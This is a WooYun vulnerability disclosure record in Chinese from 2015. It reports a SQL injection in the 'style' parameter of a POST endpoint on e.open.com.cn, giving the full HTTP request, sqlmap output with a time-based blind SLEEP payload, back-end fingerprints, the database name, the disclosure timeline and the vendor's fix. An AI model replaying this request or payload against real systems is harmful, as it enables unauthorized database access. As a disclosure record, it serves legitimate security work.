乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-29: 细节已通知厂商并且等待厂商处理中 2015-06-30: 厂商已经确认,细节仅向厂商公开 2015-07-10: 细节向核心白帽子及相关领域专家公开 2015-07-20: 细节向普通白帽子公开 2015-07-30: 细节向实习白帽子公开 2015-08-14: 细节向公众公开
注入点:POST /popu/data.php HTTP/1.1Host: e.open.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://e.open.com.cn/ty.htmlContent-Length: 471Cookie: b_t_s=t235545127433x; up_page_stime_100200=1435545127497; up_beacon_vist_count_100200=1; b_t_s_100200=210c51ab-6f80-4d1a-be56-489b3a50f91a; up_first_date=2015-06-29; up_beacon_id_100200=210c51ab-6f80-4d1a-be56-489b3a50f91a-1435545127499; __utma=209232844.538313747.1435545135.1435545135.1435545135.1; __utmb=209232844.7.10.1435545135; __utmc=209232844; __utmz=209232844.1435545135.1.1.utmcsr=learn.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/login.aspx; b_t_s_100100=bc9a7bd2-6e88-4cbb-8cc7-0bc057c57c28; __utma=221648972.123858968.1435545865.1435545865.1435545865.1; __utmb=221648972.1.10.1435545865; __utmc=221648972; __utmz=221648972.1435545865.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1Connection: keep-alivePragma: no-cacheCache-Control: no-cachestyle=%E5%B8%8C%E6%9C%9B%E5%BC%80%E9%80%9A%E4%BD%93%E9%AA%8C%E5%B8%90%E5%8F%B7&username=111111&company=111&mobile=13852147411&phone=13852147411&email=234047006%40qq.com&qq=123123123&answer=%E6%95%B0%E5%AD%97%E5%8C%96%E6%A0%A1%E5%9B%AD%E4%B8%80%E4%BD%93%E5%8C%96%E7%B3%BB%E7%BB%9F%2C%E5%A5%A5%E9%B9%8F%E8%BF%9C%E7%A8%8B%E6%95%99%E5%8A%A1%E7%B3%BB%E7%BB%9F%2C%E8%80%83%E8%AF%95%E6%B5%8B%E8%AF%84%E4%BA%A7%E5%93%81%2C%E4%BC%81%E4%B8%9A%E5%9F%B9%E8%AE%AD%E5%B9%B3%E5%8F%B0%2C
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: style (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: style=%E5%B8%8C%E6%9C%9B%E5%BC%80%E9%80%9A%E4%BD%93%E9%AA%8C%E5%B8%90%E5%8F%B7' AND (SELECT * FROM (SELECT(SLEEP(10)))NCBx) AND 'lBoP'='lBoP&username=111111&company=111&mobile=13852147411&phone=13852147411&[email protected]&qq=123123123&answer=%E6%95%B0%E5%AD%97%E5%8C%96%E6%A0%A1%E5%9B%AD%E4%B8%80%E4%BD%93%E5%8C%96%E7%B3%BB%E7%BB%9F,%E5%A5%A5%E9%B9%8F%E8%BF%9C%E7%A8%8B%E6%95%99%E5%8A%A1%E7%B3%BB%E7%BB%9F,%E8%80%83%E8%AF%95%E6%B5%8B%E8%AF%84%E4%BA%A7%E5%93%81,%E4%BC%81%E4%B8%9A%E5%9F%B9%E8%AE%AD%E5%B9%B3%E5%8F%B0,---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.5back-end DBMS: MySQL 5.0.12current database: 'ecschool'
过滤相关参数
危害等级:高
漏洞Rank:15
确认时间:2015-06-30 10:24
要求研发人员整改
暂无